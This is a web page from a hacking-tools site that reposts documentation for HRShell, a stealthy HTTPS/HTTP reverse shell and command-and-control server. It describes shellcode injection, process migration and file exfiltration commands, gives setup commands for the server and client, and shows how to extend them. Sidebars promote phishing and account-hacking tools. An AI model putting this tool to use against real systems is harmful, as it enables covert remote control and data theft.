• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2019
  • October
  • 3
  • HRShell – An Advanced HTTPS/HTTP Reverse Shell Built With Flask

HRShell – An Advanced HTTPS/HTTP Reverse Shell Built With Flask

October 3, 2019October 3, 2019 Comments Off on HRShell – An Advanced HTTPS/HTTP Reverse Shell Built With Flask
hrshell hrshell tutorial reverse http shell

HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities. It’s compatible with python 3.x and has been successfully tested on:

  • Linux ubuntu 18.04 LTS, Kali Linux 2019.3
  • macOS Mojave
  • Windows 7/10

HRShell Features

  • It’s stealthy
  • TLS support 🔑
    • Either using on-the-fly certificates or
    • By specifying a cert/key pair (more details below…)
  • Shellcode injection 💉 (more details below…)
    • Either shellcode injection in a thread of the current running process
      • Platforms supported so far:
        • Windows x86
        • Unix x86
        • Unix x64
    • or shellcode injection into another process (migrate <PID>) by specifying its PID
      • Platforms supported so far:
        • Windows x86
        • Windows x64
  • Shellcode can be set/modified on the fly from the server (more details below…)
  • Proxy support on client.
  • Directory navigation (cd command and variants).
  • download/upload/screenshot commands available.
  • Pipelining (|) & chained commands (;) are supported
  • Support for every non-interactive (like gdb, top etc…) command
  • Server is both HTTP & HTTPS capable.
  • It comes with two built-in servers 🌐 so far… flask built-in & tornado-WSGI while it’s also compatible with other production servers like gunicorn and Nginx.
  • Both server.py and client.py are easily extensible.
  • Since the most functionality comes from server’s endpoint-design it’s very easy to write a client in any other language e.g. java, GO etc…

 

Details


TLS 🔑

Server-side: Unless --http option is specified, by default server.py is HTTPS using on-the-fly certificates, since on-the-fly certificates are a built-in flask-feature. But if -s tornado option is specified in order to make the server use TLS, a --cert and a --key option must be specified like so:

python server.py -s tornado --cert /path/cert.pem --key /path/key.pem

Either “real” certificates can be used or another way to generate a cert/key pair is using openssl like so:

openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365

A cert/key pair can also be used with the flask-server:

python server.py --cert /path/cert.pem --key /path/key.pem

⚠️ If the server is using TLS, then by design the client can’t use http://... to connect to the server, but must explicitly use https instead.

Client-side: By default client’s SSL verification is disabled, unless:

  • either the --cert parameter is specified e.g.:
    python client.py -s https://192.168.10.7:5000 --cert /path/cert.pem
    
  • or the CERT variable, instead of the default None value is set beforehand with a valid certificate e.g.:
    CERT = """
    -----BEGIN CERTIFICATE-----
    MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV
    BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD
    VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa
    ...
    -----END CERTIFICATE-----
    """

    In this case client.py will attempt to create a hidden .cert.pem file on the fly and will use that instead.

Sampler – A Tool For Shell Commands Execution, Visualization And Alerting

HRShell Shellcode injection 💉

There are two “modes” of shellcode injection using the two following commands respectively:

  1. migrate <PID>: Using this command we can inject shellcode into the memory space of another process by specifying its PID. For now this command can only be applied at Windows x86/x64 platforms!

hrshell

  1. inject shellcode: Using this command a new thread of our current process is created and the shellcode injection occurs in its memory space. As a result our HTTP(S) shell is not affected by the injection. The platforms where this command can be applied are: Unix x86/x64, Windows x86 platforms!

hrshell

Notes
  • In case the injection happens on a process, then process-permissions play a very important role. It’s not always possible to inject on any process due to lack of appropriate privileges.

HRShell Set/Modify shellcode

There are two ways you can specify/set what type of shellcode you want the client to execute:

  • Either pre-set shellcode variable on client.py script to be a valid shellcode or
  • Use the set shellcode <shellcode-id> command to do that on the fly. With this command you can update your shellcode on client-side from server-side as many times as you like!

hrshell

The first way is pretty straight forward. However in order to use the second and more convenient way (since you can also modify an already specified shellcode) you have to set shellcodes/utils.py script such that it contains the shellcode(s) of your choise. The script contains an example of how you can do that.

💡 You can modify/update shellcodes/utils.py script even after you’ve launched server.py as many times as you want, since server.py will dynamically use the most updated/recent version. In this way you can set & modify shellcodes on the go…

Available commands:

Special commands:

hrshell

Any other command is supported if it’s not interactive like e.g. gdb, top etc… Also by typing python server.py -h or python client.py -h you can get information the server and client available arguments.

Note: If a client is connected with the server and we want to terminate the server, before press CTRL+C, we have to close the connection using the exit command.

SecurityNotFound – 404 Page Not Found Webshell

Creating custom commands

Client-side:

In order to create a custom command, generally:

  • a regex rule that describes the command must be defined on client-side
  • the code to handle that command must be added as an elif statement also on client-side.

Server-side:

If the command demands the existence of a new-endpoint on server-side, then:

  • to define the endpoint:
    @app.route('/custom_endpoint/<arg>')
    def custom_endpoint(arg):
        """
        documentation if needed
        """
        ...
        return ...
  • then edit handleGET() to redirect the client to that endpoint:
    @app.route('/')
    def handleGET():
        ...
        return redirect(url_for('custom_endpoint',
            arg=...)
            )
  • do the appropriate edits in handlePOST() to handle the presentation of the results.

Script-Arguments

Both scripts (server.py and client.py) can be customized through arguments:

server.py

$ python server.py -h
usage: server.py [-h] [-s] [-c] [--host] [-p] [--http] [--cert] [--key]

server.py: An HTTP(S) reverse-shell server with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify the HTTP(S) server to use (default: flask).
  -c , --client   Accept connections only from the specified client/IP.
  --host          Specify the IP to use (default: 0.0.0.0).
  -p , --port     Specify a port to use (default: 5000).
  --http          Disable TLS and use HTTP instead.
  --cert          Specify a certificate to use (default: None).
  --key           Specify the corresponding private key to use (default: None).

client.py

$ python client.py -h
usage: client.py [-h] [-s] [-c] [-p]

client.py: An HTTP(S) client with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify an HTTP(S) server to connect to.
  -c , --cert     Specify a certificate to use.
  -p , --proxy    Specify a proxy to use [form: host:port]

📦 Requirements:

To install the server-requirements:

pip install -r requirements.txt --upgrade --user

Post navigation

Dark Web Vendors Plead Guilty to Cryptocurrency Money Laundering Conspiracy
Former Yahoo Employee Pleads Guilty for Hacking into 6,000 Yahoo accounts

Related Articles

Ispy – Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit

- Payload Generators, Payloads
October 12, 2019

GodOfWar – Malicious Java WAR builder with built-in payloads

- Payload Generators, Payloads
September 13, 2019

O365 Attack Toolkit – A Toolkit to Attack Office365

- Exploitation, Payload Generators, Payloads
July 27, 2019July 27, 2019
hacker gadgets
hacker phone covers

Recent Posts

Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections

Winevt_Logs_Analysis – Searching .Evtx Logs For Remote Connections

February 5, 2023
NJ Man Attempted to Hire a Hitman on the Dark Web

NJ Man Attempted to Hire a Hitman on the Dark Web

February 5, 2023
PlumHound v1.5.1 releases: Bloodhound for Blue and Purple Teams

PlumHound v1.5.1 releases: Bloodhound for Blue and Purple Teams

February 4, 2023
EAST - Extensible Azure Security Tool - Documentation

EAST – Extensible Azure Security Tool – Documentation

February 4, 2023
Dutchman Sold Counterfeit Banknotes on the Dark Web

Dutchman Sold Counterfeit Banknotes on the Dark Web

February 4, 2023
CVE-2023-22501: Critical Flaw in Atlassian Jira Service Management Server and Data Center

CVE-2023-22501: Critical Flaw in Atlassian Jira Service Management Server and Data Center

February 4, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW